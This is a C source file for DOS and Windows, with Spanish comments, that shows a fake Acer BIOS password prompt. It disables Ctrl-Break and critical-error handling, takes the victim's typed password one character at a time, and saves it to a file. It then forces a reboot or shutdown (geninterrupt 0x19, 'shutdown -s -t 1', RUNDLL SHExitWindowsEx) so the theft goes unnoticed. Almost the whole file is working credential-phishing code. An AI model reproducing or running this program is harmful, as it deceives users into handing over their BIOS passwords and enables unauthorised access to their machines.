/*
		CMOSPasW.C

	 Funciones para hacer un Fake del BIOS PassWord.
	 Implementacion: Zapper Zaku.

	 Ultima Versin: 3.0   Fecha: 29/11/2005

*/

/*
	 Notas de este archivo:
------------------------------------------------------------------------------
	- PROGRAMA: Violar el password de seguridad (CMOS) de cualquier
							maquina. Esto se hace de la siguiente forma:
							1.- Borrar la pantalla.
							2.- Imprimir la cadena que el BIOS usa para pedir
									el password.
							3.- Pedir la cadena letra por letra, imprimiendo
									el caracter correcto.
							4.- Generar la INT 19H para simular que se va a
									cargar el sistema operativo.
 ADD 2005: En realidad no viola, ni crackea ni hackea la contrasea... es un
					 simulador que pide la contrasea al usuario y arranca la maquina
					 normalmente.
 -----------------------------------------------------------------------------
 ADD 2005: Las 3 notas siguientes solo son para los BIOS Acer antiguos, no se
					 si funcionen de la misma forma los actuales.
 NOTA1: Solo se permiten 7 caracteres.
 NOTA2: No se permiten los siguientes caracteres:
        - '/'  Diagonal normal.
        - '\'  Diagonal invertida.
        - '\t' Tabulador.
				- Cualquier caracter extendido.
------------------------------------------------------------------------------
 NOTA3: Los caracteres de la macro ACER_PEDIR_PASSWORD variar en
				algunas maquinas. Tambien puede variar el ACER_ARTERISC_CHAR.
------------------------------------------------------------------------------
ADD 2005: Solo existe un problema, si el usuario a entrado una contrasea
					incorrecta, no hay forma de corroborarla, y el programa continuara
					su ejecucion normalmente.
------------------------------------------------------------------------------
ADD 2005: Se modifico el nombre de algunas macros a ACER_ para facilitar su
					identificacion y facil adaptacion para otras BIOSes....
______________________________________________________________________________
ADD 2005: Se agrego para le version 3, soporte (aceptable), para su ejecucion
					dentro de windows.... ver Nota8
______________________________________________________________________________

Nota Final: Enjoy and Stufff!!!
*/


#ifndef Neo_CMOSPasW
	#define Neo_CMOSPssW
#else
  #error Doble Inclusin de Este Archivo
#endif


/*
   #define Neo_FORCE_MAIN
*/
/*
   #define Neo_LIB
*/
/*
   #define Neo_PROJECT
*/


#ifdef Neo_FORCE_MAIN
 #undef Neo_LIB
 #undef Neo_PROJECT
#endif

#if !(defined(Neo_LIB)||defined(Neo_PROJECT))
 #ifndef Neo_Main
   #define Neo_Main
	 #define CMOSPasW_Main
 #endif
#endif


/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     Seccin de Includes.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
#include <stdio.h>
#include <dos.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>

#ifndef Craken_CMOSPASW
 #include "CMOSPasW.H"
#endif

#ifdef CMOSPasW_Main

#endif


/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     Seccin de Variables Globales.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
void interrupt (*_CMOSPasW_Old24)(void); /* Para salvar las interrupciones */
void interrupt (*_CMOSPasW_Old1b)(void); /* que se van autilizar.          */
void interrupt (*_CMOSPasW_Old23)(void);


/*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     Seccin de Funciones.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
/*+++++++++++++++++++++++ Funciones Internas +++++++++++++++++++++++*/

/***************************************************************
 Nombre   : interrupt CMOSPasW_NewBreak
 Objetivo : Sustituir a la interrupcion del [CTRL][BREAK]
 Entrada  : Ninguna.
 Salida   : Ninguna.
****************************************************************/
static void interrupt CMOSPasW_NewBreak (void)
{
	 return; /* No hace nada... solo existir!!! */
};

/***************************************************************
 Nombre   : CMOSPasW_NewCrit
 Objetivo : Sustuir a la interrupcion de errorres criticos Int24H
 Entrada  : Ninguna.
 Salida   : El valor 0 en el registro AX.
****************************************************************/
static void interrupt CMOSPasW_NewCrit (IREGS ir)
{
	ir.ax = 0;    /* Ignore critical errors */
	return;
};
/*
 Nota4: El Warning "Parameter 'ir' is never used in function "
 no es un error ni un warnign peligroso. Lo que sucede es que el
 valor AX devuelto por este servicio de interrupcion (valor 00h en AX)
 debe ser 0. Esto es para que el servicio interrupido, "ingnore"
 los errorres generados...
*/


/*+++++++++++++++++++++++ Funciones Publicas +++++++++++++++++++++++*/

/***************************************************************
 Nombre   : CMOSPasw_GetOSVer
 Objetivo : Obtener la version de Windows, (muy Primitiva).
 Entrada  : Ninguna.
 Salida   : La version de Windows.
****************************************************************/
int CMOSPasw_GetOSVer (void)
{
	char *OsNameptr;

	if ( (OsNameptr=getenv("OS"))!=NULL )
		{
			 if (strcmp(OsNameptr, "Windows_NT")==0)
					 return OS_WIN_NT;
		}
	else
	 {
			 if (strstr(getenv("COMSPEC"), "COMMAND.COM")!=NULL)
					 return OS_WIN_9X;
	 }
	return OS_DOS;
};

/***************************************************************
 Nombre   : CMOSPasW_Init
 Objetivo : Inicializar las interrupciones a utilizar.
 Entrada  : Ninguna.
 Salida   : Ninguna.
****************************************************************/
void CMOSPasW_Init (void)
{
    /* Salvar las interrupciones originales */
	 _CMOSPasW_Old24 = getvect(0x24); /* Salvar la Interrupcion 24H */
	 _CMOSPasW_Old23 = getvect(0x23); /* Salvar la Interrupcion 23H */
	 _CMOSPasW_Old1b = getvect(0x1b); /* Salvar la Interrupcion 1bH */

	 /* Poner los nuevos vectores de interrupcion */
	 setvect(0x24, CMOSPasW_NewCrit);  /* La nueva Interrupcion 24H */
	 setvect(0x23, CMOSPasW_NewBreak); /* La nueva Interrupcion 23H */
	 setvect(0x1b, CMOSPasW_NewBreak); /* La nueva Interrupcion 1bH */
	 return;
};

/***************************************************************
 Nombre   : CMOSPasW_MExit
 Objetivo : Restaurar los valores de las interrupciones usadas.
 Entrada  : Una bandera, si es verdadera se ejecuta un exit().
 Salida   : Ninguna.
****************************************************************/
void CMOSPasW_MExit (int Flager)
{
	/* Restaurar las interrupciones utilizadas */
	setvect(0x24, _CMOSPasW_Old24); /* Restaurar la Int24H */
	setvect(0x23, _CMOSPasW_Old23); /* Restaurar la Int23H */
	setvect(0x1b, _CMOSPasW_Old1b); /* Restaurar la Int1bH */

	if (Flager>0)      /* Si Flager es mayor a 0, es porque hubo un error */
			exit(Flager);  /* en el funcionamiento, es necesario abortar      */
	return;
};

/***************************************************************
 Nombre   : CMOSPasW_ProcesoAcer
 Objetivo : Leer el teclado y guardar la contrasea.
 Entrada  : Ninguna.
 Salida   : La contrasea del usuario.
****************************************************************/
void CMOSPasW_ProcesoAcer (char *Pass)
{
	int PosPass, Renglon;
	char c;

/*
	Nota5: No olvidar que este proceso, es para la el BIOS de las
				 computadoras Acer, pero es facilmente modificable para
				 cualquier otra version de BIOS.
*/

	PosPass=0;
	Renglon=1;

OtroIntento:    /* Quien dijo que los goto deberian dejar de utilizarse!!! */

	fflush(stdin);   /* Es necesario para borrar cualquier caracter del */
									 /* buffer de teclado.                              */


	gotoxy(1, Renglon);         /* Imprimimos la peticion de Password */
	printf(ACER_PEDIR_PASSWORD);

/*
	Nota6: En este punto, aparece en la pantalla un mensaje para pedir el
				 password, cabe sealar que en la computadora Acer, de prueba
				 este mensaje constaba de 4 caracteres ("oķ "), los cuales estan
				 asignados a la macro ACER_PEDIR_PASSWORD, en los nuevos BIOS
				 es muy diferente la pantalla de peticion de password. Tambien
				 se debe sealar que los caracteres pulsados no aparecen, (los
				 famosos '*', para las contraseas), en la Acer, se utiliza el
				 caracter '', que esta en la macro ACER_ARTERISC_CHAR.
*/

	while ((c=getch())!=13) /* Mientras no se presione la tecla [ENTER]... */
   {
		 switch (c) /* Tendremos varios casos. */
     {
				case 0: /* Si es 0, es porque es una tecla extendida, y tendremos */
								/* que sacar el segundo codigo del buffer de teclado.     */
					getch(); /* Sacar el segundo codigo. */
					beep;    /* Mandar un Bip, por la bocina, indicando error. */
          break;

				case '\b':  /* Tecla retroceso. */
					 if (PosPass>0) /* Solo despues del 2 caracter. */
						 {
							 printf("\b \b"); /* Truco, en la pantalla, :P */
							 PosPass--; /* Retrocedemos un caracter. */
						 }
						else  /* Este else aqui, no es un error!! es un trucaso!!! */
									/* ver la Nota 7.                                    */
				case '/': /* Letras no validas. Upsss.... no me acuerdo :S     */
        case '\t':
						beep;  /* Pero.... indicar error.... */
						break;

				default: /* Para cualquier otra tecla.... */
						if (PosPass>ACER_MAX_CARS)
								beep;       /* Si son mas de 7 letras, Error.*/
						else
						 {
								/* Imprimir el caracater sistituto */
								putchar(ACER_ARTERISC_CHAR);
								Pass[PosPass]=c;  /* y almacenar el otro en la cadena. */
								PosPass++;
								break;
						 }
		 } /* switch(c) */
	 } /* while() */

 /*
	Nota7: Ya no me acordaba... es un trucaso de la programacion...
				 pues cualquier programador veria las siguientes lineas como
         un error de logica, gramatica y de sintaxis:
					1.-	else      * Este else aqui, no es un error!! es un trucaso!!!*
					2.-				    * ver la Nota 4                                    *
					3.-	case '/': * Letras no validas. Upsss.... no me acuerdo :S    *
					4.- case '\t':
					5.-            beep;  * Pero.... indicar error....               *
				 esto es por que despues de un else, deberia haber una sentecia,
				 cualquiera, pero un case.... un programador lo veria masl, pero
				 entendamos como trabaja una sentencia switch.... bla, bla, bla...
				 el compilador de C, entiende cada case como una etiqueta, a la que
				 debe de saltar de acuerdo al valor que esta dentro del "switch".
				 Luego entonces.... cuando se ejecuta el else (linea 1), el compilador
				 se salta "las etiquetas" case, y ejecuta la sentencia que sigue,
				 es decir el beep, (linea 5)....... como vemos.... para el compilador
				 esto no es un error... solo es otra forma de programar....
				 Atte. Zapper Zaku.....
 */

	 if (PosPass==0) /* Si fue solo enter, volver a pedir Password. */
    {
			Renglon++;
			printf("X\n"); /* Con esto, se indica password invalido. */
			goto OtroIntento; /* Aqui esta el goto!!!!!!!! */
		}

	 /* Finalmente, tendremos en la cadena Pass, la contrasea deseada. */
	 Pass[PosPass]=0; /* Convertir a cadena ASCIIZ, para su posterior manejo. */
	 return;
};

/***************************************************************
 Nombre   : main
 Objetivo : Aqui se llama a todo.
 Entrada  : Ninguna.
 Salida   : Ninguna.
****************************************************************/

#ifdef CMOSPasW_Main
void main (void)
{
	FILE *fp;
	char  Pass[40]={""};

 /*
	 Nota5: Para evitar un problema, al compilar y ejecutar este codigo...
					y un desastre posterior, inclui un define, CMOS_PASSW_EJECUTE
					el cual al estar en cometario, evita la ejecuion de la
					interrupcion 19H. Por el contrario, si se le quita el comentario
					la interrupcion 19H es ejecutada y reiniciara la maquina.....
					Para evitar esto y poder depurar el codigo sin tener tantos
					problemas, es que esta entre comentarios!!!
 */

/*	#define CMOS_PASSW_EJECUTE */

	clrscr(); /* Clasico.... una pantalla vacia..... */

	CMOSPasW_Init(); /* Inicializamos las interrupciones.... */

	if ((fp=fopen(FIL, "wb"))==NULL) /* Abrimos un archivo... */
			 CMOSPasW_MExit(1);  /* Si hubo error, restaurar interrupciones y salir */

	CMOSPasW_ProcesoAcer(Pass); /* Pedir el Password, deacuerdo al BIOS Acer. */

	fprintf(fp, Pass); /* Guardarla en el archivo. */
	fclose(fp);  /* Cerrar el archivo. */

	CMOSPasW_MExit(0);   /* Restaurar las interrupciones. */

 #ifdef CMOS_PASSW_EJECUTE

	clrscr();  /* Volvemos a limpiar la pantalla....*/
	/* Averiguar que Version de Windows estamos corriendo */
	switch(CMOSPasw_GetOSVer())
	 {
		 case OS_DOS:
					geninterrupt(0x19); /* Generar la INT 19h. Ajua!!!!!!!!!!! */
		 case OS_WIN_9X:
					system("%windir%\\RUNDLL.EXE shell32.dll,SHExitWindowsEx 2");
					break;
		 case OS_WIN_NT:
					system("%windir%\\SYSTEM32\\shutdown -s -t 1");
	 }
 #endif
/*
	Nota8: Como en Win9x y superiores no esta soportado este proceso de
				 arranque para cargar el SO sin necesidad de "arrancar" la pc;
				 encontre la siguiente sol: Reiniciar la PC, pero este proceso
				 es distinto en las versiones de Win9xMe vs. WinXP2k, por lo
				 que es necesario averiguar primero en que version de windows
				 estamos corriendo....
	Nota9: Solo una avdertencia mas....... como este programa reinicia
				 una pc cuando esta en windows, es necesario previamente guardar
				 todos los archivos que esten en uso;  de lo contrario aparecera
				 una linda ventanita indicandonos que "Documento no guardado"
				 desea guardar? Wackkkkkkk..... solo un lamer se va, dejando
				 la computadora encendida y sin guardar sus documentos.......
*/

}
#endif
